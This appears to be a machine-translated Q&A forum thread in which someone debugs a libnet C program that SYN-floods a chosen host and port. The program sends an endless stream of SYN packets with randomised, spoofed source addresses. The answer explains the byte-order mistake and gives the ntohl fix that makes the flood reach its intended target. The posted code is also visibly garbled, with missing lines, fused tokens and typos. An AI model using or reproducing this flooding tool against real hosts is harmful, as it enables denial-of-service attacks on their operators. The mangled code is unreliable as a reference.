About libnet ip Addresses

Asked 2 years ago, Updated 2 years ago, 34 views

After receiving an answer with about the data you created with libnet, I tried and found that the ip address did not go well (when running with a different ip address and using tcpdump, both ip addresses will be addressed to "").
What is this address ""?
Also, as a result of adding the following code:Is the network address "" acceptable for "402000a"?

argv[2]: -2005821230
dest_ip —402000a
dest_port —7890
SYN Flooding port 7890 of


# include <netinet/in.h>
# include <libnet.h>
# include <arpa/inet.h>

# define FLOOD_DELAY 5000 // Packet injection delay time is 5000 ms.

/* Returns IP in x.x.x.x format */
        returninet_ntoa(*(struct in_addr*)ip_addr_ptr));

int main(intargc, char*argv[]){
        uint32_t dest_ip, source;
        uint16_t dest_port;
        u_charrbuf [LIBNET_ERRBUF_SIZE], *pcap_errbuf, *packet;
        int network, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;

                printf("Usage:\n%s\t\n", argv[0]);

        // printf("device name:%s\n", alldevsp->name);
        l = libnet_init(LIBNET_RAW4, "eth0", errbuf); // Assign memory for packet intoxication
                fprintf(stderr, "Error opening context: %s\n", errorbuf);

        **printf("argv[1]:%s\n", argv[1]);
        printf("argv[2]:%d\n", argv[2]);**

        dest_ip = libnet_name2addr4(l,argv[1],LIBNET_DONT_RESOLVE); // host
        dest_port=(u_short)atoi(argv[2]); // port

        **printf("dest_ip:%x\n", dest_ip);
        printf("dest_port:%d\n", dest_port);**

        if(libnet_seed_prand(l)==-1) // seed the random number generator
                printf("Error libnet_seed_prand:%s\n", libnet_geterror(l));

        printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)));

        libnet_ptag_tag_ipv4 = 0;// libnet protocol block
        libnet_ptag_ttag_tcp = 0;// libnet protocol block

        while(1) {// Permanent loop (until terminated with CTRL-C)
                if(tag_tcp=libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // Source TCP port (randomized)
                        dest_port, // destination TCP port
                        libnet_get_prand (LIBNET_PRu32), // sequence number (randomized)
                        libnet_get_prand(LIBNET_PRu32), // Acknowledgment (ACK) number (randomized)
                        TH_SYN, // Control Flag (SYN flag only)
                        libnet_get_prand (LIBNET_PRu16), // Window Size (Random Numbering)
                        0, // checksum 0 = autofill
                        0, // Urgent Pointer
                        LIBNET_TCP_H, // header length
                        NULL,// payload (none)
                        0, // payload length
                        l,//libnet context
                        0) ==-1)//protocol tag
                        printf("Error building TCP header; %s\n", libnet_geterror(l));

                if(tag_ipv4=libnet_build_ipv4(packet_size, // packet size excluding IP header)
                        IPTOS_LOWDELAY, // IP tos
                        libnet_get_brand(LIBNET_PRu16), // IP ID (randomized)
                        0,// Fragmentation
                        libnet_get_prand(LIBNET_PR8), // TTL (randomized)
                        IPPROTO_TCP, // Transport Protocol
                        0, // checksum 0 = autofill
                        libnet_get_brand(LIBNET_PRu32), // Source IP (randomized)
                        dest_ip, // Destination IP (little endian)
                        NULL,// payload (none)
                        0, // payload length
                        l,//libnet context
                        0) ==-1)//protocol tag
                        printf("Error building IP header; %s\n", libnet_geterror(l));

                        printf("@Errolibnet_write:%s\n", libnet_geterror(l));

                USLEEP(FLOOD_DELAY); // Wait for FLOOD_DEPLAY milliseconds

        libnet_destroy(l);// Free up packet memory

        return 0;


2022-09-29 21:20

1 Answers

The value returned by the libnet_name2addr4 function (IPv4 address) is "network order" and the IPv4 address requested by the argument of the libnet_build_ipv4 function is "little endian", so the byte order appears to be reversed.

# The debug output should be "a000204".

Therefore, it appears to be sending packets to an unintended IP address.

libnet_name2addr4 function description.(Excerpt from header file)

@return describes "network order."

 * Takes a dotted decimal string or a canonical DNS name and returns a 
 * network byte ordered IPv4 address. This may include DNS lookup if mode is
 * set to LIBNET_RESOLVE and host_name references to a canonical DNS name.If mode
 * is set to LIBNET_DONT_RESOLVE no DNS lookup will occur. The function can
 * fail if DNS lookup fails or if mode is set to LIBNET_DONT_RESOLVE and
 * host_name references to a canonical DNS name.
 * @param l pointer to a libnet context
 * @param host_name pointer to a string containing a presentation format host
 * name
 * @return address in network byte order
 * @retval-1(2^32-1)on error 
libnet_name2addr4(libnet_t*l, const char*host_name, uint8_tuse_name);

libnet_build_ipv4 function description.(Excerpt from header file)

@param dst says little endian

 * Builds a version 4 RFC 791 Internet Protocol (IP) header.
 * @param ip_len total length of the IP packet including all subsequence data (subsequence)
 *   data include any IP options and IP options padding)
 * @param tos type of service bits
 * @paramid IP identification number
 * @param fragmentation bits and offset
 * @param ttl time to live in the network
 * @param protector layer protocol
 * @param sum checksum (0 for libnet to auto-fill)
 * @param src source IPv4 address (little endian)
 * @param dst destination IPv4 address (little endian)
 * @param payload optional payload or NULL
 * @param payload_spayload length or 0
 * @param l pointer to a libnet context
 * @param ptag protocol tag to modify an existing header, 0 to build a new one
 * @return protocol tag value on success
 * @retval-1 on error
libnet_build_ipv4(uint16_tip_len, uint8_tos, uint16_tid, uint16_tfrag,
uint8_ttl, uint8_t plot, uint16_tsum, uint32_t src, uint32_tdst,
constuint8_t*payload, uint32_tpayload_s, libnet_t*l, libnet_ptag_ttag);


Therefore, I think you can convert the return value of the libnet_name2addr4 function to "little endian".
I think there are many ways to convert it, but I think the typical one is ntohl.

/*Usage Examples*/
dst = ntohl(dst);

# Since it is a Kali Linux environment, we assume that the host order is Little endian.

2022-09-29 21:20

If you have any answers or tips

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